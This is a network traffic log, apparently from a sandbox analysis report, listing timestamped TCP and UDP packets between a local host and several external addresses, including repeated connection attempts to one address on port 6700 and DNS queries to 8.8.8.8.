Feb 25, 2021 11:05:15.582087994 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582087040 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582108974 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582117081 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582129955 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582153082 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582163095 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582174063 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582187891 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582195997 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582216978 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582240105 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582259893 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582262039 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582283020 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582300901 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582304955 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582326889 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582343102 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582348108 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582369089 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582372904 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582391024 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582416058 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582423925 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582437992 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582458019 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582462072 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582480907 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582499981 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582505941 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582546949 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582716942 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582737923 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582762957 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582784891 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582786083 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582807064 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582828045 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582854033 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582861900 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582874060 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582895994 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582896948 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582921982 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582932949 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582956076 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582974911 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.582978010 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.582999945 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583022118 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583043098 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.583043098 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583065033 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583077908 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.583086014 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583115101 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.583638906 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583664894 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583693981 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583723068 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583723068 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.583751917 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583754063 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.583785057 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583801031 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.583813906 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583841085 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583867073 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.583869934 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583898067 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583915949 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.583925962 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583956957 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.583983898 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584017992 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584029913 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.584045887 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584074974 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584090948 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.584105015 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584372044 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.584592104 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584618092 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584651947 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584682941 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584690094 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.584705114 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584733963 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584745884 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.584757090 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584834099 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.584919930 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584952116 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584988117 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.584995985 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.585017920 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585050106 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585052013 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.585083961 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585099936 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585133076 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585160017 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585170031 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.585181952 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585200071 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585217953 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585237026 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585254908 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585257053 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.585279942 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585345030 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585376978 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.585407972 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.585489988 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.591279030 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.591308117 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.591335058 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.591362953 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.591393948 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.591424942 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.591460943 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.591882944 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.591912031 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.591938019 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.591942072 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.591975927 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592008114 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592009068 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592036009 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592051983 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592067957 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592097044 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592123985 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592127085 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592159033 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592189074 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592223883 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592258930 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592284918 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592313051 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592340946 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592366934 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592386961 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592397928 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592412949 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592412949 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592416048 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592417955 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592447996 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592473984 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592506886 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592538118 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592545986 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592562914 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592586994 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592629910 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592655897 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592689991 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592694998 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592710972 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592729092 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592773914 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.592868090 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592892885 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592924118 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592951059 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592978001 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.592978954 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.593003035 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.593004942 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.593031883 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.593065023 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.593065977 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.593101025 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.593115091 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.593143940 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.593147039 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.593174934 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.593184948 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.593214035 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:16.460832119 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:16.507858038 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522572994 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522592068 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522610903 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522622108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522633076 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522644043 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522655010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522666931 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522677898 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522690058 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522701025 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522708893 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:16.522711992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522723913 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522736073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522746086 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.522762060 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:16.522816896 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:16.523905993 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.523920059 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.523936987 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.523947954 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.523960114 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.523976088 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.523987055 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.523998976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.524004936 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:16.524010897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.524022102 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:16.524029016 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:16.524032116 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.524044991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.524061918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.524066925 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:16.524070024 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.524076939 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:16.524095058 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:16.524167061 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:25.903058052 CET	49732	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:05:29.069614887 CET	49732	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:05:29.635320902 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:29.635524988 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:35.070055962 CET	49732	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:05:42.977694035 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.032078981 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060276031 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060340881 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060379982 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060416937 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060455084 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060460091 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.060488939 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.060497046 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060544014 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060561895 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.060585976 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060626984 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060648918 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.060652018 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060689926 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060724020 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.060736895 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060779095 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060802937 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.060807943 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060842037 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.060879946 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.069933891 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.069979906 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070038080 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070060015 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.070080996 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070095062 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.070127964 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070169926 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070225000 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070225954 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.070267916 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070312977 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070326090 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.070359945 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070378065 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070391893 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.070420980 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070450068 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070477009 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:43.070492029 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.070511103 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:43.117671013 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:46.431936026 CET	49734	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:05:49.572141886 CET	49734	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:05:55.587390900 CET	49734	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:06:06.896799088 CET	49735	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:06:09.885483980 CET	49735	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:06:16.073507071 CET	49735	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:06:16.610177040 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:06:16.674617052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:06:16.674727917 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:06:26.313483953 CET	49740	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:06:29.308957100 CET	49740	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:06:30.900154114 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:06:35.309483051 CET	49740	6700	192.168.2.5	185.157.160.229
Feb 25, 2021 11:06:43.599371910 CET	49741	6700	192.168.2.5	185.157.160.229

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 11:03:57.636429071 CET	62060	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:03:57.686729908 CET	53	62060	8.8.8.8	192.168.2.5
Feb 25, 2021 11:03:57.782604933 CET	61805	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:03:57.832546949 CET	53	61805	8.8.8.8	192.168.2.5
Feb 25, 2021 11:03:57.841439009 CET	54795	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:03:57.891654015 CET	53	54795	8.8.8.8	192.168.2.5
Feb 25, 2021 11:03:58.465707064 CET	49557	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:03:58.514386892 CET	53	49557	8.8.8.8	192.168.2.5
Feb 25, 2021 11:03:59.245920897 CET	61733	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:03:59.294641972 CET	53	61733	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:00.205962896 CET	65447	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:00.254743099 CET	53	65447	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:00.685094118 CET	52441	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:00.748605967 CET	53	52441	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:01.144614935 CET	62176	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:01.193430901 CET	53	62176	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:02.442065954 CET	59596	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:02.490878105 CET	53	59596	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:03.763638973 CET	65296	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:03.812383890 CET	53	65296	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:06.193120003 CET	63183	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:06.252135992 CET	53	63183	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:06.876347065 CET	60151	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:06.933918953 CET	53	60151	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:07.150935888 CET	56969	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:07.199676991 CET	53	56969	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:14.779427052 CET	55161	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:14.828146935 CET	53	55161	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:26.155874014 CET	54757	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:26.216181993 CET	53	54757	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:29.199273109 CET	49992	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:29.247950077 CET	53	49992	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:30.199223995 CET	60075	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:30.248034000 CET	53	60075	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:48.094589949 CET	55016	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:48.143368006 CET	53	55016	8.8.8.8	192.168.2.5
Feb 25, 2021 11:04:53.852750063 CET	64345	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:04:53.904506922 CET	53	64345	8.8.8.8	192.168.2.5
Feb 25, 2021 11:05:04.625102043 CET	57128	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:05:04.684876919 CET	53	57128	8.8.8.8	192.168.2.5
Feb 25, 2021 11:05:10.422106028 CET	54791	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:05:10.483798027 CET	53	54791	8.8.8.8	192.168.2.5
Feb 25, 2021 11:05:14.601785898 CET	50463	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:05:14.660923004 CET	53	50463	8.8.8.8	192.168.2.5
Feb 25, 2021 11:05:32.043323040 CET	50394	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:05:32.110202074 CET	53	50394	8.8.8.8	192.168.2.5
Feb 25, 2021 11:06:11.326905966 CET	58530	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:06:11.375838995 CET	53	58530	8.8.8.8	192.168.2.5
Feb 25, 2021 11:06:12.990271091 CET	53813	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:06:13.039043903 CET	53	53813	8.8.8.8	192.168.2.5
Feb 25, 2021 11:06:16.882678032 CET	63732	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:06:16.934257984 CET	53	63732	8.8.8.8	192.168.2.5
Feb 25, 2021 11:06:17.450437069 CET	57344	53	192.168.2.5	8.8.8.8
